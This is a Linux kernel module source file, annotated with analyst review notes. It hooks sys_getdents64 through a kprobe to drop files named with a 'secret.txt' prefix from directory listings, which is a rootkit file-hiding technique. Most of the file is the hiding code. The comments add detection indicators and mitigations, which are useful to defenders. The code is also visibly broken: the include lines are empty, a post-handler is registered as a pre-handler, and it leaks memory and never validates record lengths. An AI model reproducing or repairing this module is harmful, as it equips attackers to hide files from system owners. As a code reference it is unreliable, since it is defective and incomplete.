/*
 * Kernel module sample: installs a kprobe on the symbol "sys_getdents64"
 * and, in the probe handler, edits a buffer of linux_dirent64 records so
 * that entries whose name begins with FILE1 are dropped from the result.
 *
 * Review notes for analysts and responders:
 *  - The module does nothing to conceal itself in the code shown here, and
 *    it registers an ordinary kprobe. On a live host, look for an
 *    unexpected entry in /sys/kernel/debug/kprobes/list (needs debugfs)
 *    and for an unknown module in /proc/modules.
 *  - The handler logs "nread = ..." and "vedsod" at KERN_INFO on its code
 *    paths; those strings in the kernel log are direct indicators.
 *  - Listings served by a kernel with this loaded cannot be trusted;
 *    compare against an offline or raw view of the filesystem.
 *  - Loading requires the ability to insert modules, so module signature
 *    enforcement, kernel lockdown, or kernel.modules_disabled=1 after boot
 *    close off this class of tampering.
 *  - The handler has several memory-safety defects (marked inline) that can
 *    leak kernel memory, hang, or crash the host it is loaded on.
 */

/* NOTE(review): the six header names were lost when this page was
 * extracted; the bare directives are kept exactly as found. */
#include
#include
#include
#include
#include
#include

/* Name to filter out of directory listings. It is compared as a prefix
 * (see the strncmp below), so longer names starting with it also match. */
#define FILE1 "secret.txt"

MODULE_LICENSE("GPL");

/*
 * Probe handler: copies a dirent buffer out of user space, removes every
 * record whose d_name starts with FILE1, writes the shortened buffer back
 * and stores the new length in regs->ax.
 *
 * @p:     the kprobe that fired (unused).
 * @regs:  saved registers at the probe; ax is read as a byte count and bx
 *         as the user buffer pointer (x86 field names).
 * @flags: unused.
 *
 * NOTE(review): this function has the three-argument shape of a kprobe
 * post handler, yet the kprobe below assigns it to .pre_handler; the
 * register values it reads are whatever they hold when the probe fires.
 * Whether ax/bx carry the values the code assumes is not established by
 * anything on this page.
 */
static void getdents_post_handler(struct kprobe *p, struct pt_regs *regs, unsigned long flags)
{
	long nread;
	struct linux_dirent64 __user *dirent;
	char *kbuf;
	long bpos;
	long new_nread;
	struct linux_dirent64 *d;

	nread = regs->ax;
	dirent = (struct linux_dirent64 __user *)regs->bx;
	printk(KERN_INFO "nread = %ld", nread);

	/*
	 * NOTE(review): nread is used as an allocation size without any range
	 * check (zero, negative and very large values are all passed through).
	 * GFP_KERNEL and copy_from_user() may sleep, which is unsafe in kprobe
	 * handler context.
	 */
	kbuf = kmalloc(nread, GFP_KERNEL);
	if (!kbuf)
		return;

	/* NOTE(review): kbuf is not freed on this early return (leak). */
	if (copy_from_user(kbuf, dirent, nread)) {
		return;
	}

	bpos = 0;
	new_nread = nread;
	/*
	 * Walk the variable-length records. d_reclen comes from the copied
	 * buffer and is never validated: a zero value keeps bpos fixed and the
	 * loop never ends; an oversized value makes the next record pointer
	 * and the memmove() length run outside kbuf.
	 */
	while (bpos < new_nread) {
		d = (struct linux_dirent64 *)(kbuf + bpos);
		/* Prefix comparison: only strlen(FILE1) bytes are checked. */
		if (strncmp(d->d_name, FILE1, strlen(FILE1)) == 0) {
			printk(KERN_INFO "vedsod");
			/* Slide the tail over the matched record; bpos stays put
			 * so the record now at this offset is examined next. */
			memmove(kbuf + bpos, kbuf + bpos + d->d_reclen, new_nread - (bpos + d->d_reclen));
			new_nread -= d->d_reclen;
			continue;
		} else {
			bpos += d->d_reclen;
		}
	}

	/* NOTE(review): kbuf is not freed on this early return either. */
	if (copy_to_user(dirent, kbuf, new_nread)) {
		return;
	}

	/* Store the shortened byte count back into the saved ax register. */
	regs->ax = new_nread;
	kfree(kbuf);
}

/* Probe descriptor: the target is resolved by symbol name at registration. */
static struct kprobe kp = {
	.symbol_name = "sys_getdents64",
	.pre_handler = getdents_post_handler,
};

/*
 * Module entry point: registers the kprobe.
 * NOTE(review): the return value of register_kprobe() is discarded, so the
 * module reports success even when the probe was not installed.
 */
static int __init init(void)
{
	register_kprobe(&kp);
	return 0;
}

/* Module exit point: removes the kprobe registered in init(). */
static void __exit exit(void)
{
	unregister_kprobe(&kp);
}

module_init(init);
module_exit(exit);